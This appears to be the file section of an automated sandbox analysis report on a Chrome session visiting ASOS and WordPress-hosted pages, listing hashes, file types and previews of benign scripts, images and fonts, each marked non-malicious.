                                                                                                                                                                                                                                                                  SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                                                                                                                                                                                                                  MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                                                                                                                                                                                                                  SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                                                                                                                                                                                                                  SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                                                                                                                                                                                                                  SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3339)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):3415
                                                                                                                                                                                                                                                                  Entropy (8bit):5.76169598667777
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:0h5hVbhByDhBhjE8hLhYhWhLqhchnhT6XEvshzhpwhv9sF8Xx:0h5hVbhByDhBhjVhLhYhWhLqhchnhuzs
                                                                                                                                                                                                                                                                  MD5:BB4C55761E0BF2440C63900CEE1202A7
                                                                                                                                                                                                                                                                  SHA1:AD24FD87E5429D8357CC21B31970EDAA4466C5DC
                                                                                                                                                                                                                                                                  SHA-256:42CB235ECBD9D1D131F379C7C0F6FB0D52F7F643BEA9D9BA1CBA01D3F39D686E
                                                                                                                                                                                                                                                                  SHA-512:1BB254091DCED688CA5D828CB72F06F77301BCCF9BE4EE4341C4560A66AE6E830679FCBC1AA61F09B316114E5CC900A845BC2AB6B77028A38A47793F9B19B0DA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([[546],{62476:(e,t,n)=>{n.d(t,{Z:()=>o});const o={close:"osdMOxg nJoGg3s"}},66023:(e,t,n)=>{n.d(t,{Z:()=>o});const o={Facebook:"J8Sftp9",Instagram:"mbXMayF",Snapchat:"CDRgBJC",Vk:"ZNHON6r"}},93819:(e,t,n)=>{n.d(t,{Z:()=>o});const o={deleteItem:"iWftf0U",deleteItemIcon:"ANCLgSx XmGonBy"}},81566:(e,t,n)=>{n.d(t,{Z:()=>o});const o={container:"oCe7D_L",product:"JWX9giR",voucher:"LKuNB8y",link:"e_Ko7LM EVhxZk8 leavesden2",image:"hK_95HO",details:"dLwsYMN ZHWKoMf leavesden3",price:"EmQ8iyH",item:"Je6Smy_",name:"ZlDAIIp",subscription:"RcMrzfR",meta:"fRrEDSy",colour:"ji3ec_g",size:"z3Jlz7A",quantity:"fv6LRW4",srOnly:"kTiVPVf AQi6YMD"}},46421:(e,t,n)=>{n.d(t,{Z:()=>o});const o={container:"_8m5CpA",current:"vx3UDYg TNLlZ7K london3",highlight:"IyFDfqo",previous:"p76OcV_ sOoULa1 leavesden4",rrp:"E6qPMvE sOoULa1 leavesden4",rrpLabel:"MRDNoo1"}},98438:(e,t,n)=>{n.d(t,{Z:()=>o});const o={pageOverlay:"sC6a41z",side:"uZHyLwH",fadeI
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (31976)
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):237598
                                                                                                                                                                                                                                                                  Entropy (8bit):5.541876874202883
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:uuVmMfnms+7IZV9U3c+68DjtB17hJ4KKW:uuVFc7IZVOFzDjtB17IKKW
                                                                                                                                                                                                                                                                  MD5:88BC94EBC5ED5FF8DD4F6BB388EA203C
                                                                                                                                                                                                                                                                  SHA1:780DA4EE83C4570394BE152F6410C302152F86A0
                                                                                                                                                                                                                                                                  SHA-256:CCB30C86CA83B1B077C2F35F5C1F06EC0B03ED3BFE4EADF1F4E3F20CAAF1FCC8
                                                                                                                                                                                                                                                                  SHA-512:864CB6BD67C4CB31CFD7412A306523C33B72CCB866B881D2C944122EB40BA7B9C10A964B80FF6067F3A71F1235056CAF6CEF8857216248B50FF21CEB54E62B32
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://ci.asosservices.com/core/shared-libs-4.0.15.min.js
                                                                                                                                                                                                                                                                  Preview:function AppMeasurement_Module_ActivityMap(a){function b(a,b){var c,d,e;if(a&&b&&(c=g.c[b]||(g.c[b]=b.split(","))))for(e=0;e<c.length&&(d=c[e++]);)if(-1<a.indexOf(d))return null;return i=1,a}function c(b,c,d,e,f){var g,h;if(b.dataset&&(h=b.dataset[c])?g=h:b.getAttribute&&((h=b.getAttribute("data-"+d))?g=h:(h=b.getAttribute(d))&&(g=h)),!g&&a.useForcedLinkTracking&&f&&(g="",c=b.onclick?""+b.onclick:"")){d=c.indexOf(e);var i,j;if(0<=d){for(d+=10;d<c.length&&0<="= \t\r\n".indexOf(c.charAt(d));)d++;if(d<c.length){for(h=d,i=j=0;h<c.length&&(";"!=c.charAt(h)||i);)i?c.charAt(h)!=i||j?j="\\"==c.charAt(h)?!j:0:i=0:'"'!=(i=c.charAt(h))&&"'"!=i&&(i=0),h++;(c=c.substring(d,h))&&(b.e=new Function("s","var e;try{s.w."+e+"="+c+"}catch(e){}"),b.e(a))}}}return g||f&&a.w[e]}function d(a,c,d){var e;return(e=g[c](a,d))&&(i?(i=0,e):b(f(e),g[c+"Exclusions"]))}function e(a,b,c){var d;if(a&&!(1===(d=a.nodeType)&&(d=a.nodeName)&&(d=d.toUpperCase())&&j[d])&&(1===a.nodeType&&(d=a.nodeValue)&&(b[b.length]=d),c.a||
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (50450)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):50959
                                                                                                                                                                                                                                                                  Entropy (8bit):5.357310062408202
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:7m58qk43Xg4dsB62gZR9ZjaDHZ0cyBxdhifxItD:7mJB3XrsBs9560cyBxdcfxItD
                                                                                                                                                                                                                                                                  MD5:76F55EE255012A4A449F15A401D952A3
                                                                                                                                                                                                                                                                  SHA1:B02E1D4D68EA9210C715C118F00BFAF22C269CCB
                                                                                                                                                                                                                                                                  SHA-256:037B8F92A29A18ABEB0DCE30FC8CA5B6DC8BF4220383AF63E013C29F8464339C
                                                                                                                                                                                                                                                                  SHA-512:3C5CD16543419070AFC29D0998CA0639BDD5517761F148EF6DF981FC131E22333D70FCD5C2269EDE6BBC047BC9C237B1938603AE31FA2DF8DB9E4218E7EF17E7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:(function() {. window.cx = window.cx || {};. window.cx.configNewRelic = window.cx.configNewRelic || function(appIdStr) {. ;window.NREUM||(NREUM={});NREUM.init={privacy:{cookies_enabled:true}};.. ;NREUM.loader_config={accountID:"711799",trustKey:"711799",agentID: appIdStr,licenseKey:"3edea625b0",applicationID: appIdStr};. ;NREUM.info={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net",licenseKey:"3edea625b0",applicationID: appIdStr,sa:1};.. (()=>{"use strict";var e,t,r={5763:(e,t,r)=>{r.d(t,{P_:()=>l,Mt:()=>g,C5:()=>s,DL:()=>v,OP:()=>T,lF:()=>D,Yu:()=>y,Dg:()=>h,CX:()=>c,GE:()=>b,sU:()=>_});var n=r(8632),i=r(9567);const o={beacon:n.ce.beacon,errorBeacon:n.ce.errorBeacon,licenseKey:void 0,applicationID:void 0,sa:void 0,queueTime:void 0,applicationTime:void 0,ttGuid:void 0,user:void 0,account:void 0,product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},a={};function s(e){if(!e)throw new Error("All info obj
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (51254), with CRLF, LF line terminators
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):347350
                                                                                                                                                                                                                                                                  Entropy (8bit):5.574171384043137
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:PJ5cO8Tejh3sHVZCeptbC43DvCITK83gYQos3kd:78CaC43D4os3kd
                                                                                                                                                                                                                                                                  MD5:EA3D75B4FC9564F51FD98D520DC7F259
                                                                                                                                                                                                                                                                  SHA1:894003F8BE5705AC7E05B4BED240BE5370319C53
                                                                                                                                                                                                                                                                  SHA-256:F8C081F14A69A365C3181DC7D0B6AD5CEB99AAFA5B6AD936F9627923D4297A10
                                                                                                                                                                                                                                                                  SHA-512:D151DA6ABC5164FA67AE0A5640888E040984849FC72728C9FA7D05C0E38F5493E17047AE3AFDC577203C4AF5F79BA8336618AF38A69AA82B52AE84F3B32435FC
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.asos.com/
                                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>. 13.0.0-6ca9c0c7-69--><html lang="en-GB" data-platform="desktop" data-store-code="COM" data-country-code="GB" data-gender="null">. <head><script>!function(i,n){let o=window[i]=window[i]||{};o=o[n]=o[n]||{},o._cookieData={initialLength:document.cookie.length,initialCount:document.cookie.split(";").length}}("asos","siteChrome");.//# sourceMappingURL=https://assets.asosservices.com/sitechromepublisher/cookieScript.2d2fd467.inlined.js.map</script><meta charSet="utf-8"/><title>ASOS | Online Shopping for the Latest Clothes & Fashion</title><meta name="description" content="Discover the latest fashion trends with ASOS. Shop the new collection of clothing, footwear, accessories, beauty products and more. Order today from ASOS."/><meta name="p:domain_verify" content="7d543da16a86f7ad75c452097bfa9e47"/><meta name="msvalidate.01" content="0BC251BA275FCFB5D0505FEBC89F03B6"/><meta property="fb:app_id" content="123073601043263"/><meta name="viewport" content="width=devi
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):3584
                                                                                                                                                                                                                                                                  Entropy (8bit):7.928464857549821
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:9sEXYk+HMSRsIK53q0mKmqekrE9IQaEmOJpOwEHtSVg//+si+MCi8iP0xRdsz6:bYvlsR3ntxrE1aEmOJcHt3//+r9L02z6
                                                                                                                                                                                                                                                                  MD5:814C967BCFF1E61CBD2FBCA2ABFA73EB
                                                                                                                                                                                                                                                                  SHA1:F4359D25B4529B960150769BC8B297C1BB115A5C
                                                                                                                                                                                                                                                                  SHA-256:D964E97D2D522765DAA6EC422A62C547F2B5564C8616C9F4BF3D7AFA08C99BE2
                                                                                                                                                                                                                                                                  SHA-512:7CE384E45ED885CAAEB9804A17965B77B2F04A333F9DAA6C3FFD3451671AEE47651992674A4220C4315F4EC407986DD124DEA9CD81C652BEDB6651DF2EF3ED58
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...P...P............sRGB.........IDATx..]}l......;..+.....+N...;. .....6.....*....*...R.W.....R9..T...B...$.B.$Rh. ...vc.v..G..?.......n..y.n}9.}..fo..../..y3..<....8o|t.V].Vi~.J..U.i....g*...b.q.p$%...RIiM%..N...r~~....W7.k.....u.M.....7k.w............`.fra..mJ#...R>ZE.%..X ..Q...o1')ko..?....Nn.I...^.T.F...q.).?......i.....||..$?S.x.c....K_.$..9d{.n:w.k2f.(..:g.>.PCjG..|..5.W!......?..x.(.;3~..3..)....g..Q....`'.c9.^ZI.7n.3.2=.q....^....<.9../r....J.9(..#..h...ggw.19.....a...y....7....K.....h.N(.k........7..kc-.:R..N:r.%(..{....{..)..{.?t.......(+.`..3H~!.Hg..,$..{.}H.]m....n.Y...j.....A..i......,....hll....Nzw.oE^$.x.4~..=`.2.....p.ut...y..Oq....my.m......H6{..g..w...R...8\\.....36.6...g..<......v....j..6.........w.\0n..y...o[...ue....L......)..X.W.....0K.;...Rww7....:V.X.....9.....:.C.....O}...7|..A..}.=....}...c.i......v..V.ZE%%%b\f.lhmm..947.6.Z....Q....x.P....z..'X...(....+.-.........|......FGG7....e..`N..7g%.
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 100328, version 1.0
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):100328
                                                                                                                                                                                                                                                                  Entropy (8bit):7.997025820145762
                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                  SSDEEP:3072:BpkxKyo/oHSkWgqY7lFUCgwjxFs4gaPCh:BpkNjpHVvUsxe4/Ch
                                                                                                                                                                                                                                                                  MD5:C26F515D871B7504C1B1D7B0A78AA756
                                                                                                                                                                                                                                                                  SHA1:BE8DFC8708250BB5A53D2804D147B74D9516CEC7
                                                                                                                                                                                                                                                                  SHA-256:A409B4776AC7E8E623C3963EC8598E77166A2B65A502907E1D3108C177818427
                                                                                                                                                                                                                                                                  SHA-512:783BB5D36AB521079C69386EE87259DB785EDAE0C8AEBA418AE14120B42520534EA3244009511FBF4FA420AA8B410C8E442C9ED6FFDFEA024BB1BA89A500E966
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://fonts.wp.com/s/inter/v13/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuLyfMZ1rib2Bg-4.woff2
                                                                                                                                                                                                                                                                  Preview:wOF2...............\......................................x.`?STATH............C..P..6.$..J. .........[.F..Rd.{.}Pa&t%+....VQE...k../..gjX.g..!....[.n.t....ZW.;.`nj.A.u'..Q.v.................d..tw......#T:.....`.-.q.$BD3z...........`I..A..^j...n8..R$7..=..k=.....$a......*Ne@u.gpNH.....Ke#....q..V.N...H...w.^..Gra`.{N......0x/.fB..Tq....2.+..<a[l..8..[...:....... ...x\.B...K>....;..e!.0!...}G..d6..b.l?....i.2P....#.....d...!.,h..P......G........+...O.".6......./y}.Jq..............4.[....a..C..'..V...j]Hs..T......0...s.>..^?..8..WC.....n...\g.'.....^.2..T%T.i..7..(...2....y.+......Dv...^.<%...?...y.....+...O..P(|Qv................Up..p!(U.'....Z6R......e2...R^.I...u.dgzU.n.0..TH_.Hm.>..7H...V.ZyB.[....X..+<.".d1.-\'.U.J.`...A....O.K...R..<0U...g..}l.Ab..<...#&|....s:......L..T.s.x0..#\. .;.^.<..../.X...L..^o~..J.h.h."^.....z...IJ..l..U..$TQbl2...>.............p.{|..d.r..%"6LL....,.rXI......bZ\m.[."~c.5.-.U.1......Ix....o.{.^}....n.w......W....+
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):4148
                                                                                                                                                                                                                                                                  Entropy (8bit):7.009644422435151
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:+dYj4lvHFflsXlf/lulel4wlwx+6MjnNsvIYWiR5QkyTJbZPHXZ9u6gbVwyKzJg6:+OjO9N26MT0D5MdtbZPAVwzV2FDGKTw
                                                                                                                                                                                                                                                                  MD5:AEA3F60A4572696E9B27683A9AE84E97
                                                                                                                                                                                                                                                                  SHA1:9D658FFCA30339020065BB00112DCA08BD6CD40F
                                                                                                                                                                                                                                                                  SHA-256:8D30479054381B32AB7E1564474346745A6BCDF5FBBDD7110A1B7260A5C9EE0E
                                                                                                                                                                                                                                                                  SHA-512:7D5F2204BA8DDDA28EFFA4A6162232C028BD42D61C7774DA76A6ABB279C517B6B53C10DC45216E28D0654C511650A932F2AE77E9764DD83B99AA5E22814EB307
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://images.asos-media.com/navigation/pay-pal-png
                                                                                                                                                                                                                                                                  Preview:... ftypavif....avifmif1miafMA1A....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............e.................[...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......`...<....pixi............av1C. .....Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (6113), with no line terminators
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):6113
                                                                                                                                                                                                                                                                  Entropy (8bit):5.310396655001161
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:i9bTjbFak4+lRjSPntzo5EmOSLV9wV5OlvCFOnii0Oul70sD3Qh63M3s/:BtgERj0sDhEg
                                                                                                                                                                                                                                                                  MD5:84D47CA1D55A2794BA71A628BA44C72A
                                                                                                                                                                                                                                                                  SHA1:CA68D49F59FE61BDCAA585AD3444D29ACFC6A520
                                                                                                                                                                                                                                                                  SHA-256:3DDB970BEACA133988D2C7D9DA6883C3B81A5F5635C2A5B72EBF64438058D1C2
                                                                                                                                                                                                                                                                  SHA-512:B822A50A59564B992E1FE8BD364D2985D806D89A39E289BEF45628F5FC2E02682C4C358001871EC472565153C4A0B1BC55D58BC7D7A258F267F310CD18B687D6
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://s1.wp.com/wp-content/js/mobile-useragent-info.js?m=1609849039i
                                                                                                                                                                                                                                                                  Preview:(function(e){var i={PLATFORM_WINDOWS:"windows",PLATFORM_IPHONE:"iphone",PLATFORM_IPOD:"ipod",PLATFORM_IPAD:"ipad",PLATFORM_BLACKBERRY:"blackberry",PLATFORM_BLACKBERRY_10:"blackberry_10",PLATFORM_SYMBIAN:"symbian_series60",PLATFORM_SYMBIAN_S40:"symbian_series40",PLATFORM_J2ME_MIDP:"j2me_midp",PLATFORM_ANDROID:"android",PLATFORM_ANDROID_TABLET:"android_tablet",PLATFORM_FIREFOX_OS:"firefoxOS",PLATFORM_MOBILE_GENERIC:"mobile_generic",userAgent:false,matchedPlatformName:false,matchedUserAgentName:false,init:function(){try{i.userAgent=e.navigator.userAgent.toLowerCase();i.getPlatformName();i.getMobileUserAgentName()}catch(e){console.error(e)}},initForTest:function(e){i.matchedPlatformName=false;i.matchedUserAgentName=false;try{i.userAgent=e.toLowerCase();i.getPlatformName();i.getMobileUserAgentName()}catch(e){console.error(e)}},getMobileUserAgentName:function(){if(i.matchedUserAgentName!==false)return i.matchedUserAgentName;if(i.userAgent===false)return false;if(i.isChromeForIOS())i.matchedU
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):89501
                                                                                                                                                                                                                                                                  Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                                                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                                                                                                                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):5251
                                                                                                                                                                                                                                                                  Entropy (8bit):7.9565996287313965
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:uAyv/RGhcSveQIh/15grzRsy7uc4zamdXWMjl/4Hs+Duixj2IRk4C:9mGyfQMNq7kamJ7JqTDvjlA
                                                                                                                                                                                                                                                                  MD5:60C9CC3825ADC832284FD90757C37ADB
                                                                                                                                                                                                                                                                  SHA1:9816C325E87F9C139C86C4CA26D364263E6B57CA
                                                                                                                                                                                                                                                                  SHA-256:4B2575CF62363CAD5DDEBDFB8CA4F8DA40156FFEF1754537E659CD023D806087
                                                                                                                                                                                                                                                                  SHA-512:CB8B478440C9CC8982CF0CFAA886E7EBB6CC01A71003F3DE2E3BA41E7DF55E8673AC9E805B1F84FF5EDC702B56986701FB215B56F63D3A6B00C53B4DD37D3F69
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://assets.asosservices.com/storesa/images/flags/au.png
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...P...P............sRGB........=IDATx..].x.E...I2..M.#..$..11...l...*.....z....c.Y@].U....(.|..@.E...+.%..$wf.9....d2.. ...}_......~...{.^$......U..T.6...H=.iV+......NM.H.r.=..I54..2:..RHs.P...@.*.Gr6.-.Z..g..p......0...ix-.}....#b.e.$(.;!+.........l..f).).j..........M........1.,.[..@7....t.e.G..|zh....|w....{.~...Em-.+.....#]Q&...G....WZ&.z.....`.>.$..Xs....<..U.r....9..,.VA.....O//t_2.a...D.._.......Ua.........z:.k.K....B.......F....<.v.:;.j.%.>K...U.S/.._o:...D"A.c...<(..p.X.^^..~..dwm...N....^l..K ..k..~...{.....06..U.0k...V'(.I.F]Ih......."x.E.Rq5.....?:...=....#M(..A(.~.t9|....u..>...]...U.0...1p..prk...>...'.:.^...5..x%.:k...0Q.6......-J.........V...........uN..|.N+~Z"......9..j....4...:.....}.G.h.'..'$i..~3s....}.....x...)8........M.....}.........g....*.&.M_..<.*g..(..7W@..j..<{...O.....H._*..`..R..8_..R.. b.S..<.55F.y.g...C..`... #*.n..ByH...4....v-.0..a.P.C.S..]C...rBE.... .]..d.j.....w"=....j..&.!.`.x.V.vC..,<."Q.E..
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):2228
                                                                                                                                                                                                                                                                  Entropy (8bit):7.82817506159911
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                                                                                                                                                                                                                                                  MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                                                                                                                                                                                                                  SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                                                                                                                                                                                                                  SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                                                                                                                                                                                                                  SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.gstatic.com/recaptcha/api2/logo_48.png
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3339)
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):3415
                                                                                                                                                                                                                                                                  Entropy (8bit):5.76169598667777
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:0h5hVbhByDhBhjE8hLhYhWhLqhchnhT6XEvshzhpwhv9sF8Xx:0h5hVbhByDhBhjVhLhYhWhLqhchnhuzs
                                                                                                                                                                                                                                                                  MD5:BB4C55761E0BF2440C63900CEE1202A7
                                                                                                                                                                                                                                                                  SHA1:AD24FD87E5429D8357CC21B31970EDAA4466C5DC
                                                                                                                                                                                                                                                                  SHA-256:42CB235ECBD9D1D131F379C7C0F6FB0D52F7F643BEA9D9BA1CBA01D3F39D686E
                                                                                                                                                                                                                                                                  SHA-512:1BB254091DCED688CA5D828CB72F06F77301BCCF9BE4EE4341C4560A66AE6E830679FCBC1AA61F09B316114E5CC900A845BC2AB6B77028A38A47793F9B19B0DA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://assets.asosservices.com/sitechromepublisher/client.sitechrome.deferred.1897f5341c56d1e99fd5.js
